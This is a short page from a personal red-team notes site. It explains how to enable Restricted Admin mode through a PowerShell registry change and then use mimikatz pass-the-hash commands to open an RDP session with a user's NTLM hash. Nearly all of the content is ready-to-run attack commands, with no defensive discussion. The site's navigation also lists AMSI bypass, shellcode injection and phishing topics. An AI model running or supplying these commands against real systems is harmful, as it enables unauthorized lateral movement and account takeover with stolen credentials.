😎
Intruder
😎
Intruder
Twitter
About Shantanu Khandelwal
Reporting
Excel Sheet to Word Report by PowerShell
Ghostwriter - Add report type
Red Team
Domain Front
GoLang
ShellCode Injection
PowerShell
Enable Restricted Admin using powershell and use mimikatz for RDP
Powershell Custom Runspace
Using Reflection for AMSI Bypass
Database
Dealing with the Errors
Setting Up OPENVAS in KALI 2020.3
Phishing
Connecting GoPhish with Office365
SharpLoginPrompt - Success and a Curious Case
Powered by GitBook

Enable Restricted Admin using powershell and use mimikatz for RDP

To enable restrcitedadmin using powershell run the following command.

New-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa'  -Name 'DisableRestrictedAdmin' -Value 0 -PropertyType DWORD

Now you can use mimikatz as follows to get RDP session

token::elevate
privilege::debug
sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's ntlm hash> /run:"mstsc.exe /restrictedadmin /v:<IP of the system>"
Red Team - Previous
PowerShell
Next
Powershell Custom Runspace
Last updated 4 months ago